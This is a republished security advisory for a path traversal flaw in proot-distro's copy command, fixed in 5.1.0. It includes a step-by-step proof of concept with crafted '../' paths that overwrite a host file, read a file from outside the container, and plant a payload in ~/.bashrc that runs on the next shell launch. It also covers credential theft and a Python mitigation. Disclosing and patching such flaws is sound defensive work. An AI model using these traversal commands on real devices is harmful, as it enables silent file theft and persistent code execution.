Summary
PRoot-Distro has Path Traversal in proot-distro copy, Arbitrary Read, Write, and Persistent Code Execution Outside Container Rootfs
proot-distro copy, Arbitrary Read, Write, and Persistent Code Execution Outside Container Rootfs
Repository
https://github.com/termux/proot-distro
Maintainer: @sylirre
Affected Component
- Package: proot-distro
- Affected command:
copy - Attack surface: Host-side Termux CLI, this is not a guest distro shell issue
- Vulnerability type: Path Traversal (CWE-22)
Affected Versions
| Component | Version |
|---|---|
| proot-distro | 4.38.0 (initially discovered), 5.0.2 (confirmed still affected, tested on 2026-05-19) |
| Test distro | Ubuntu 25.10 "Questing Quokka" (ubuntu alias) |
| Architecture | aarch64 |
| Device | Samsung A23 |
| Package source | https://packages-cf.termux.dev/apt/termux-main stable/main aarch64 |
Proof of Concept
All tests were performed using only self-owned files and harmless marker data.
No root was used. No third-party data was involved. The .bashrc overwritten
during testing was immediately restored.
Step 1, Setup
rm -rf ~/poc
mkdir -p ~/poc
Step 2, Arbitrary write (overwrite a file outside the container rootfs)
echo "ORIGINAL" > ~/poc/target.txt
echo "PWNED_BY_PROOT_DISTRO" > ~/poc/evil.txtproot-distro copy
~/poc/evil.txt
"ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/poc/target.txt"
Observed output:
[*] Source: '/data/data/com.termux/files/home/poc/evil.txt'
[*] Destination: '/data/data/com.termux/files/home/poc/target.txt'
[*] Copying files, this may take a while...
[*] Finished copying files.
Verification:
cat ~/poc/target.txt
→ PWNED_BY_PROOT_DISTRO
This confirms that the destination resolved to a path outside the container rootfs and the file was overwritten successfully.
Step 3, Arbitrary read (exfiltrate a file from outside the container rootfs)
echo "TOP_SECRET" > ~/poc/secret.txtproot-distro copy
"ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/poc/secret.txt"
~/poc/read_result.txt
Observed output:
[*] Source: '/data/data/com.termux/files/home/poc/secret.txt'
[*] Destination: '/data/data/com.termux/files/home/poc/read_result.txt'
[*] Copying files, this may take a while...
[*] Finished copying files.
Verification:
cat ~/poc/read_result.txt
→ TOP_SECRET
This confirms that the source path resolved to a file outside the container rootfs and its contents were successfully copied to a host-side destination.
Step 4, Persistent code execution via .bashrc overwrite
printf 'echo VULN_TRIGGERED > ~/poc/proof.txt\n' > ~/poc/payload.shproot-distro copy ~/poc/payload.sh
"ubuntu:$(printf '../%.0s' {1..20})data/data/com.termux/files/home/.bashrc"
Observed output:
[*] Source: '/data/data/com.termux/files/home/poc/payload.sh'
[*] Destination: '/data/data/com.termux/files/home/.bashrc'
[*] Copying files, this may take a while...
[*] Finished copying files.
Verification before restart:
cat ~/.bashrc
→
echo VULN_TRIGGERED > ~/poc/proof.txt
After closing and reopening Termux, the new shell sourced .bashrc and
executed the payload automatically:
cat ~/poc/proof.txt
→ VULN_TRIGGERED
This confirms that attacker-controlled content written into .bashrc executes
automatically on the next shell launch, resulting in persistent local code
execution within the Termux app context.
Attack Scenario
The most realistic exploitation path is a confused deputy scenario: a community
script, Termux plugin, or automated tool calls proot-distro copy with a path
derived from untrusted input. The attacker supplies a crafted container path.
The tool resolves it to a host-side location and reads or writes the file
without any boundary check. The user sees normal command output and no
indication that a file outside the container was touched.
On a real device with SSH keys or stored credentials in the Termux home
directory, the read primitive allows silent credential theft. The write
primitive to .bashrc allows persistent code execution triggered on next login.
Proposed Fix
After resolving the container-relative path, verify that the canonical result remains inside the container rootfs before allowing any read or write operation. Example mitigation pattern in Python:
import osdef safe_resolve(rootfs, container_path):
candidate = os.path.realpath(os.path.join(rootfs, container_path.lstrip('/')))
root = os.path.realpath(rootfs)
if candidate != root and not candidate.startswith(root + os.sep):
raise ValueError("path traversal detected: resolved path escapes rootfs")
return candidate
This check must be applied to both the source and destination paths in the
copy subcommand.
Additional Notes
- This issue was reproduced on the official Termux release from https://packages-cf.termux.dev, not a fork.
- No root access was used at any point during testing.
- All test files were self-owned and contained only harmless marker data.
- The
.bashrcoverwritten during testing was immediately restored after verification.
Impact
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
GHSA-MFR4-MQ8W-VMG6 has a CVSS score of 6.6 (Medium). The vector is requires local access, low privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.1.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-MFR4-MQ8W-VMG6? GHSA-MFR4-MQ8W-VMG6 is a medium-severity path traversal vulnerability in proot-distro (pip), affecting versions < 5.1.0. It is fixed in 5.1.0. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is GHSA-MFR4-MQ8W-VMG6? GHSA-MFR4-MQ8W-VMG6 has a CVSS score of 6.6 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of proot-distro are affected by GHSA-MFR4-MQ8W-VMG6? proot-distro (pip) versions < 5.1.0 is affected.
- Is there a fix for GHSA-MFR4-MQ8W-VMG6? Yes. GHSA-MFR4-MQ8W-VMG6 is fixed in 5.1.0. Upgrade to this version or later.
- Is GHSA-MFR4-MQ8W-VMG6 exploitable, and should I be worried? Whether GHSA-MFR4-MQ8W-VMG6 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-MFR4-MQ8W-VMG6 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-MFR4-MQ8W-VMG6? Upgrade
proot-distroto 5.1.0 or later.